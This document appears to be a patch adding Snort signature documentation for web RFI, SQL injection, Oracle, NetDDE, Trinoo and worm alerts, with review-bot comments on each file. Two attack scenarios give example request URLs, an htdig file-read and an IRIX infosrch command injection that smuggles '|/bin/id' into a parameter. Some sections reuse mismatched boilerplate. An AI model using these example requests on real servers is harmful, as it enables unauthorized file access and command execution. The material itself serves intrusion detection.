+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
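Review bot: this hunk is missing the Affected Systems section that every other signature document in the set carries, and the Sid is written on one line ("Sid: 1990") while the rest put the number on its own line; both should be made consistent. The references are all MSN Messenger protocol documents, so if this rule matches MSN traffic the Summary should say so instead of "network chat clients" generically. Typo: "unkown" in Impact.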
--- /dev/null
+++ b/doc/signatures/100000666.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000666
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "files.php" using a remote file being passed as the 
+"footer_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "footer_prog" parameter in the "files.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
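Review bot: the third paragraph of Detailed Information (validating client credentials, trust relationships) is generic CGI boilerplate that has nothing to do with a remote file include through the "footer_prog" parameter; drop it so the document describes the actual issue. Wording: "an exploitation attempt has been attempted" in the Summary should be "an exploitation attempt has been made", and "running ona web server" is "running on a web server".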
--- /dev/null
+++ b/doc/signatures/2742.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2742
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
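Review bot: the procedure name in Detailed Information is broken across lines ("alter_priority_varchar2" on one line, ". This procedure is included in" on the next, "dbms_repcat." on a third), which looks like a templating artefact; join it into one sentence: "a vulnerability in the procedure alter_priority_varchar2. This procedure is included in dbms_repcat." Affected Systems also repeats the vendor name ("Oracle Oracle9i"), and Additional References is empty where the relevant Oracle alert should be cited.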
--- /dev/null
+++ b/doc/signatures/110-4.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+110-4
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically an invalid
+mapping was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
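Review bot: Attack Scenarios is empty and Impact is "Unknown", yet Ease of Attack is "Simple"; the three sections should agree. spp_unidecode is the Snort preprocessor that decodes Unicode-encoded HTTP request URIs, so if, as the name suggests, the "invalid mapping" is a Unicode sequence in a URI that does not map to a valid character, the Summary should say that and the scenario should describe a request using such encoding to slip past URI matching. The two blank lines at the top of the file (before "Rule:") should be removed, and "consititute" is a typo.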
--- /dev/null
+++ b/doc/signatures/100000633.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000633
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_active.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_active.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
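Review bot: Corrective Action only says to patch, but the document itself says the flaw is a file included from a remote machine via "admin_template_path"; the standard server-side mitigation is to set allow_url_include (and, where not needed, allow_url_fopen) to Off in php.ini so include() cannot fetch URLs at all, and to have the application resolve the template path against a fixed directory instead of taking it from the request. Add that here, since it protects installs that cannot be patched immediately. Wording: "an exploitation attempt has been attempted" should be "has been made".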
--- /dev/null
+++ b/doc/signatures/2929.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2929
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
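Review bot: Detailed Information says the NetDDE service is not started by default, which is the key triage fact for this rule and belongs under False Positives or Corrective Action as well: an alert against a host where the Network DDE service is stopped or disabled cannot have succeeded, so verifying the service state on the target should be the first response step before escalating. "Ease of Attack: Simple" also sits oddly next to a fixed-length buffer overflow that needs a specially crafted message; the other documents in this set use "Simple. Exploits exist." where public exploit code is known, and that wording would be more informative here.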
--- /dev/null
+++ b/doc/signatures/100000471.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000471
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "show.php" with SQL commands being passed as the "objectID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "objectID" parameter in the "show.php" script used by 
+the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
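Review bot: the third paragraph of Detailed Information (client credential validation, trust relationships) is generic boilerplate unrelated to SQL injection through "objectID"; remove it. Corrective Action should add the application-level fix that Attack Scenarios already implies: pass "objectID" to the database as a bound parameter rather than by string concatenation and, if the value is meant to be a numeric identifier, reject anything that is not an integer before it reaches the query.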
--- /dev/null
+++ b/doc/signatures/1600.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+1600
+
+--
+Summary:
+This event is generated when an attempt is made to read a file on a host using a well known vulnerability in htdig.
+
+--
+Impact:
+Severe. Unauthorized file access
+
+--
+Detailed Information:
+Some versions of htdig allow inclusions to be made from configuration files as a parameter to the htsearch function. Any file can be included by enclosing it in single quotes ('foo').
+
+Using this vulnerability, any single quoted input string (`....`) is included as an index file by htsearch. This allows an attacker to read any file on the host.
+
+This event is generated when a request is made to the cgi script htsearch with file inclusion attempted. Refer to the rule with sid 1601 for further exploitation attempts.
+
+--
+Affected Systems:
+HTDig versions 3.1.1, 3.1.2, 3.1.3, 3.1.4 and 3.2.0b1
+
+--
+Attack Scenarios:
+An attacker can try to include a file in the search parameters for htdig by using the -c flag. For example:
+http://www.foo.com/cgi-bin/htsearch?-c%60/anyfile%60
+
+--
+Ease of Attack:
+Simple. No exploit scripts required
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Related Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+Bugtraq:
+http://www.securityfocus.com/bid/1026
+
+--
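Review bot: the quoting described is inconsistent within the hunk. The first paragraph of Detailed Information says files are included by enclosing them in single quotes ('foo'), the next paragraph says backticks (`....`), and the example URL in Attack Scenarios uses %60, which is a backtick; settle on one (the URL suggests backticks are what the rule matches). The product name is written "htdig" in the text and "HTDig" under Affected Systems; pick one spelling.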
--- /dev/null
+++ b/doc/signatures/1500.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1500
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
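Review bot: the whole document is generic web-server boilerplate (the same text is reused for sid 1820 later in this patch) and never states the URI, application or pattern that sid 1500 matches, so it does not help an analyst decide whether the alert is real; add at least the matched path and an entry under Additional References, which is empty. "attackers choosing" should read "attacker's choosing".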
--- /dev/null
+++ b/doc/signatures/100000481.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000481
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Hinton Design PHPHG" application running on a 
+webserver. Access to the file "signed.php" using a remote file being passed as 
+the "phphg_real_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "phphg_real_path" parameter in the "signed.php" script 
+used by the "Hinton Design PHPHG" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Hinton Design PHPHG
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
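Review bot: Affected Systems says "All systems running CGI applications using Hinton Design PHPHG", which does not tell an administrator which PHPHG releases need the fix; list the affected versions, or say all versions prior to the fixed one, and cite the advisory under Additional References, which is empty. The third paragraph of Detailed Information is the same credential-validation boilerplate as in the other remote file include documents and does not describe this flaw; remove it.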
--- /dev/null
+++ b/doc/signatures/100000176.txt
@@ -0,0 +1,61 @@
+Rule: 
+
+--
+Sid: 
+100000176
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the lpd service for HP-UX.
+
+-- 
+Impact: 
+Denial of Service (DoS). Possible code execution.
+
+--
+Detailed Information:
+A vulnerability exists in the lpd service for HP-UX systems. An unauthenticated 
+attacker may issue a DoS attack on the victim lpd by sending malformed data to 
+the lpd service and attempting to overflow a fixed length buffer. It may also 
+be possible for an attacker to execute code of their choosing in the context of 
+the user running lpd.
+
+--
+Affected Systems:
+HP-UX 10.20
+HP-UX B11.10 and B11.11
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed request to the lpd service on the victim 
+host that may leave the service unresponsive.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
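Review bot: Additional References is empty although the Summary describes "a known vulnerability in the lpd service for HP-UX" and Affected Systems pins it to specific releases (10.20, B11.10 and B11.11); a link to the HP advisory or the CVE entry would let analysts confirm which lpd flaw this rule covers. Minor: several label and separator lines ("Rule: ", "Sid: ", "-- ") carry trailing whitespace that the other files do not, and "None Known." is capitalised differently from the "None known." used elsewhere in the patch.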
--- /dev/null
+++ b/doc/signatures/1820.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1820
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
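Review bot: "Possible execution of arbitrary code of the attackers choosing" in the Impact section needs the possessive "attacker's" (the same phrase recurs in other files in this patch). More importantly, Summary, Detailed Information and Attack Scenarios are entirely generic ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion"), so the document never states which web server or application flaw SID 1820 detects; a sentence naming the request pattern the rule matches would also make the empty Additional References section easier to fill.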
--- /dev/null
+++ b/doc/signatures/231.txt
@@ -0,0 +1,70 @@
+Rule:
+--
+Sid:
+231
+
+--
+Summary:
+This event is generated when a pong packet for the Trinoo (aka trin00) 
+DDos suite is detected.
+
+--
+Impact:
+This may indicate a compromised system or be the prelude to a
+Distributed Denial of Service (DDoS) attack.
+
+--
+Detailed Information:
+Once a Trinoo client has been installed on a compromised machine and a master is
+ready and listening, the master sends a "png" (ping) command to its drones in 
+an attempt to enumerate the drone network. A functioning client will respond to 
+port 31335/udp with the text "PONG".
+
+Once a machine becomes part of a trin00 network, a Denial of Service (DoS) 
+is typically initiated against one (or more) victim machines.
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of a large scale attack against a machine or a network, an
+attacker will compromise large numbers of machines which will form the
+army that the trin00 master daemon will command.  The master daemon
+typically instructs the clients to send mass-quantities of packets to
+a set of victim hosts.  If the traffic is sufficient, the victim
+machines will become resource deprived and thus endure a DoS condition.
+
+--
+Ease of Attack:
+Simple. Trinoo client and master programs are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disconnect infected machine(s) from the network immediately.
+
+Use software to determine if a host has been compromised using a
+rootkit.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Jon Hart <warchild@spoofed.org>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+SANS:
+http://www.sans.org/newlook/resources/IDFAQ/trinoo.htm
+
+--
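Review bot: The Affected Systems section is empty (only a whitespace line follows the label); it should at least say that any host on which a trin00 daemon has been installed is affected, since Detailed Information already describes that condition. Minor: "DDos suite" in the Summary should be "DDoS" to match the Impact section, "--" directly follows "Rule:" without the blank line used elsewhere, and the text alternates between "Trinoo" and "trin00" without stating that the two names refer to the same tool (the Summary's "aka" does this once; reuse one spelling afterwards).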
--- /dev/null
+++ b/doc/signatures/728.txt
@@ -0,0 +1,91 @@
+Rule:
+
+--
+Sid:
+728
+
+
+--
+Summary:
+This event is generated when worm activity is detected. More specifcally
+this event indicates possible "My Romeo" propogation.
+
+--
+Impact:
+Serious. The victim host may be infected with a worm.
+
+--
+Detailed Information:
+This worm propogates via electronic mail and exploits a known
+vulnerability in the way that versions of Microsoft Outlook and Internet
+Explorer handle trusted HTML pages. The worm is launched via a compiled
+HTML file (.chm) which is used by Microsoft WIndows Help.
+
+The executable part of the worm is called from within the trusted
+compiled HTML file. The worm attempts to propagate using hard coded
+addresses of SMTP servers.
+
+This worm is also Known As: Romeo and Juliet, W32/Verona, TrojBlebla.A
+
+--
+Affected Systems:
+	Microsoft Windows 9x
+	Microsoft Windows 2000
+
+--
+Attack Scenarios:
+Symantec Anti-Virus center states that the worm arrives as an email
+message that has an HTML body and two attachments named Myjuliet.chm
+and Myromeo.exe. The subject of the email is selected at random from
+the following set:
+
+Romeo&Juliet
+hello world
+subject
+ble bla, bee
+I Love You ;)
+sorry...
+Hey you !
+Matrix has you...
+my picture
+from shake-beer
+
+--
+Ease of Attack:
+Simple. This is worm activity.
+
+--
+False Positives:
+Legitimate electronic mail containing the known subject lines used by
+MyRomeo may cause this rule to generate an event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+Use Anti-Virus software to detect and delete virus laden email.
+
+This worm makes changes to the system registry, removal of the affected
+registry keys should be done using an appropriate virus removal tool or
+by an experienced Windows administrator.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+McAfee
+http://vil.nai.com/vil/content/v_98894.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blebla.worm.html
+
+--
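Review bot: Spelling errors in the Summary and Detailed Information: "specifcally", "propogation" and "propogates" (the same paragraph later spells "propagate" correctly), "WIndows", and "also Known As" with a stray capital; the Sid section also has a doubled blank line before "--". The False Positives entry implies the rule keys on the subject lines listed under Attack Scenarios, several of which ("hello world", "my picture") are common in benign mail; it would help tuning to say whether the attachment names Myjuliet.chm and Myromeo.exe are also part of the match.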
--- /dev/null
+++ b/doc/signatures/985.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+985
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
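Review bot: As with SID 1820 earlier in this patch, the Detailed Information ("Many known vulnerabilities exist for this platform and the attack scenarios are legion") never identifies which IIS request pattern SID 985 matches, and Additional References is empty; one sentence describing the detected request would let an analyst judge the alert. "attackers choosing" in Impact should read "attacker's choosing".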
--- /dev/null
+++ b/doc/signatures/1196.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+
+Sid:
+1196
+
+--
+
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the IRIX infosrch.cgi web application.
+
+--
+Impact:
+Execution of code of the attackers choosing is possible.
+
+--
+Detailed Information:
+sgi IRIX 6.5 through 6.5.7 ships with a web application called InfoSearch
+that is vulnerable to a remote execution attack.
+
+An attacker may have abused the infosrch.cgi web application that ships
+with IRIX 6.5 to remotely execute arbitrary commands as the webserver user.
+
+--
+Affected Systems:
+	SGI IRIX 6.5 to 6.5.7
+ 
+--
+Attack Scenarios:
+An attacker uses an existing, publically known exploit script, or
+sends a simple, handcrafted URL to the webserver such as:
+http://target/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+The InfoSearch web application may legitimately be used to browse system
+documentation.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to determine whether malicious code was contained in
+the fname HTTP GET variable, such as unix shell commands.  If it looks
+like it may have been malicious code, determine whether the targetted
+web server was running a vulnerable version of IRIX.
+
+Upgrade to the latest non-affected version of the product.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
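Review bot: The first Corrective Action paragraph ("Examine the packet to determine whether malicious code was contained in the fname HTTP GET variable...") is investigation guidance rather than a fix and would sit better under False Positives; the remaining two lines (upgrade, apply patches) are the actual corrective action. Spelling: "publically" should be "publicly", "targetted" should be "targeted", "unkown" in Contributors should be "unknown", and "sgi IRIX" should match the "SGI IRIX" used under Affected Systems. Additional References is empty for a flaw that Affected Systems pins to IRIX 6.5 through 6.5.7; the SGI advisory is the natural reference.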
--- /dev/null
+++ b/doc/signatures/3271.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3271
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
